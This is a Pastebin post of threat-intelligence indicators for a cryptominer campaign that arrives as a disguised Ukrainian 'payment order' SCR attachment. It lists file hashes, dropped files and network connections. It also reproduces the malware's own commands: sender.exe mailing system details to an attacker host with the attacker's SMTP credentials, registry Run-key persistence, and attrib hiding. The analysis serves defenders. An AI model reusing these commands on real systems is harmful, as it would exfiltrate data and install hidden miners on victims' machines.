API tools faq
paste
Advertisement
VRad

#coinminer_150319

VRad
Mar 20th, 2019
727
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.16 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #coinminer #bmcon #SCR
  2.  
  3. https://pastebin.com/eTPuCkhC
  4.  
  5. previous contact:
  6. https://pastebin.com/ELpZTc1y
  7.  
  8. attack_vector
  9. --------------
  10. email attach > SCR > C:\Intel\*
  11.  
  12. email_headers
  13. --------------
  14. n/a
  15.  
  16. files
  17. --------------
  18. SHA-256 fd32435ce01a45ddc600edd467787586712408978f0807c12dc622824eb2f93e
  19. File name Платіжне доручення 1C №14343676173 - 2019.rar [RAR archive data, vd4,]
  20. File size 735.93 KB
  21.  
  22. SHA-256 5850342390bb431b1a0dc364156bff767444cf50987a4c743ff9a29b79e3a10e
  23. File name Платіжне доручення 1C №14343676173 - 2019.scr [PE32 executable (GUI) Intel 80386, for MS Windows]
  24. File size 793.76 KB
  25.  
  26. SHA-256 40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34
  27. File name bmcon.exe [Intel 80386, for MS Windows, UPX compressed]
  28. File size 354.5 KB (363008 bytes)
  29.  
  30. SHA-256 1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918
  31. File name sender.exe [Intel 80386, for MS Windows]
  32. File size 220 KB (225280 bytes)
  33.  
  34. SHA-256 b4633ffa43df5e8887714ce7dd580f80455050a552de4665ab1fdafd13c36ca7
  35. File name bm-xmrig.exe [PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows]
  36. File size 750.5 KB (768512 bytes)
  37.  
  38. activity
  39. **************
  40. SEND SMTP_587
  41. --------------
  42. 220 vserver321.axc.nl ESMTP Exim 4.91 Wed, 20 Mar 2019 15:55:26 +0100
  43. EHLO apm11
  44. 250-vserver321.axc.nl Hello apm11 [victim-Public-IP]
  45. 250-SIZE 52428800
  46. 250-8BITMIME
  47. 250-PIPELINING
  48. 250-AUTH PLAIN LOGIN
  49. 250-STARTTLS
  50. 250 HELP
  51. AUTH PLAIN AHNlbmRlckBkb3dubG9hZC1maWxlcy5zaXRlAGVwc2lsb25lcmlkYW5h
  52. 235 Authentication succeeded
  53. MAIL FROM:<sender@download-files.site> BODY=8BITMIME
  54. 250 OK
  55. RCPT TO:<recipient@account-identification.site>
  56. 250 Accepted
  57. DATA
  58. 354 Enter message, ending with "." on a line by itself
  59. Date: Tue, 19 Mar 2019 14:39:17 +0200
  60. From: Robot Ukr<sender@download-files.site>
  61. To: recipient@account-identification.site
  62. X-Mailer: Blat v3.0.7, a Win32 SMTP/NNTP mailer http://www.blat.net
  63. Message-ID: <01d4de50$Blat.v3.0.7$c4997ae5$478b0b0efc2@download-files.site>
  64. Subject: PC-APM11/User-support
  65. MIME-Version: 1.0
  66. Content-Transfer-Encoding: quoted-printable
  67. Content-Type: text/plain;
  68. charset="UTF-8"
  69.  
  70. OS-Windows7 x64/CPU-*** 2.50GHz/Cores-2/G=
  71. PU-...................... VGA ...................... ..............
  72. .
  73. 250 OK id=1h6ccp-002kK0-KG
  74. QUIT
  75. 221 vserver321.axc.nl closing connection
  76.  
  77. netwrk
  78. --------------
  79. http
  80. 93.184.221.240 ctldl.windowsupdate.com GET /msdownload/update/v3/static/... HTTP/1.1 Microsoft-CryptoAPI/6.1
  81. 178.18.231.122 isrg.trustid.ocsp.identrust.com GET /MFEwTzBNMEswSTAJBgUrD... HTTP/1.1 Microsoft-CryptoAPI/6.1
  82. 178.18.231.114 ocsp.int-x3.letsencrypt.org GET /MFMwUTBPME0wSzAJBgUrD... HTTP/1.1 Microsoft-CryptoAPI/6.1
  83. 93.184.221.240 ctldl.windowsupdate.com GET /msdownload/update/v3/static/t... HTTP/1.1 Microsoft-CryptoAPI/6.1
  84. 178.18.231.121 crl.microsoft.com GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1 Microsoft-CryptoAPI/6.1
  85.  
  86. ssl
  87. 88.99.38.225 dl.browsermine.com Client Hello
  88.  
  89. comp
  90. --------------
  91. bmcon.exe 3064 TCP localhost 49518 88.99.38.225 443 ESTABLISHED
  92. bmcon.exe 3064 TCP localhost 49519 93.184.221.240 80 ESTABLISHED
  93. bmcon.exe 3064 TCP localhost 49520 178.18.231.122 80 ESTABLISHED
  94. bmcon.exe 3064 TCP localhost 49521 178.18.231.114 80 ESTABLISHED
  95. bmcon.exe 3064 TCP localhost 49522 88.99.38.225 443 ESTABLISHED
  96.  
  97. bm-xmrig.exe 1776 TCP localhost 49524 159.69.189.115 4444 ESTABLISHED
  98.  
  99. svchost.exe 244 TCP localhost 49525 93.184.221.240 80 ESTABLISHED
  100. svchost.exe 244 TCP localhost 49526 178.18.231.121 80 ESTABLISHED
  101.  
  102. proc
  103. --------------
  104. "C:\Users\operator\Desktop\Платіжне доручення 1C №14343676173 - 2019.scr" /S
  105. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  106.  
  107. C:\Windows\SysWOW64\cmd.exe ""C:\Intel\enable.cmd" "
  108. C:\Windows\SysWOW64\reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Интегрированные_драйвера" /f
  109.  
  110. C:\Windows\SysWOW64\powercfg.exe -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
  111. C:\Windows\SysWOW64\powercfg.exe -change -standby-timeout-ac 0
  112. C:\Windows\SysWOW64\powercfg.exe -change -hibernate-timeout-ac 0
  113. C:\Windows\SysWOW64\powercfg.exe -h off
  114.  
  115. C:\Windows\SysWOW64\attrib.exe ATTRIB +s +h C:\Intel
  116. C:\Windows\SysWOW64\attrib.exe ATTRIB +s +h C:\Intel\bmcon
  117.  
  118. C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
  119. C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .
  120.  
  121. C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
  122. C:\Intel\sender.exe -to recipient@account-identification.site -f "Robot Ukr<sender@download-files.site>" -server smtp.download-files.site -port 587 -u sender@download-files.site -pw epsiloneridana -subject "PC-APM11/User-support" -body "OS-Windows7 x64/CPU-*** CPU @ ***GHz/Cores-2/GPU-Стандартный VGA графический адаптер"
  123.  
  124. C:\Windows\SysWOW64\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\private.exe" /f
  125.  
  126. C:\Windows\SysWOW64\PING.EXE ping -n 300 127.0.0.1
  127.  
  128. C:\Intel\bmcon.exe
  129. "C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"
  130. "C:\Intel\bmcon\bm-xmrig.exe"
  131.  
  132. persist
  133. --------------
  134. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19.03.2019 14:39
  135.  
  136. #1 BMCon c:\intel\bmcon.exe 03.11.2018 2:42
  137.  
  138. #2 private 17.229.13.523.351 18.14.13.5356 Installation 17.19.11.15
  139. c:\intel\private.exe 20.06.1992 0:22
  140.  
  141. drop
  142. --------------
  143. C:\Intel\GfxUI.exe.config
  144. C:\Intel\IGFXDEVLib.dll
  145. C:\Intel\iglhxa32.vp
  146. C:\Intel\Impcd.cat
  147. C:\Intel\IntcDAuC.dll
  148. C:\Intel\mup.xml
  149. C:\Intel\private.exe
  150. C:\Intel\readme-VGA.txt
  151. C:\Intel\sender.exe
  152. C:\Intel\Setup2.if2
  153.  
  154. C:\Intel\bmcon\apps.json
  155. C:\Intel\bmcon\bmstart.exe
  156. C:\Intel\bmcon\bm-xmrig.exe
  157. C:\Intel\bmcon\bm-xmrig.json
  158. C:\Intel\bmcon\bm-xmrig-amd.exe
  159. C:\Intel\bmcon\bm-xmrig-amd.json
  160. C:\Intel\bmcon\bm-xmrig-nvidia.exe
  161. C:\Intel\bmcon\bm-xmrig-nvidia.json
  162. C:\Intel\bmcon\bm-xmrig-nvidia-cuda8.exe
  163. C:\Intel\bmcon\bm-xmrig-nvidia-cuda10.exe
  164. C:\Intel\bmcon\bm-xmrig-x32.exe
  165. C:\Intel\bmcon\nvrtc64_80.dll
  166. C:\Intel\bmcon\nvrtc64_100_0.dll
  167. C:\Intel\bmcon\nvrtc-builtins64_80.dll
  168. C:\Intel\bmcon\nvrtc-builtins64_100.dll
  169. C:\Intel\bmcon.exe
  170. C:\Intel\bmcon.json
  171.  
  172. # # #
  173. https://www.virustotal.com/gui/file/fd32435ce01a45ddc600edd467787586712408978f0807c12dc622824eb2f93e/details
  174. https://www.virustotal.com/gui/file/5850342390bb431b1a0dc364156bff767444cf50987a4c743ff9a29b79e3a10e/details
  175. https://analyze.intezer.com/#/analyses/b2d98806-3481-4422-9f5c-07ffe8707cde
  176.  
  177. https://www.virustotal.com/gui/file/40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34/details
  178. https://www.virustotal.com/gui/file/1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918/details
  179. https://www.virustotal.com/gui/file/f887f9c7b425495ad336ca8125a5dd8ee9a9353ce3431407f45d085d76b1be04/details
  180. https://www.virustotal.com/gui/file/b4633ffa43df5e8887714ce7dd580f80455050a552de4665ab1fdafd13c36ca7/details
  181.  
  182. VR
  183.  
  184. @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!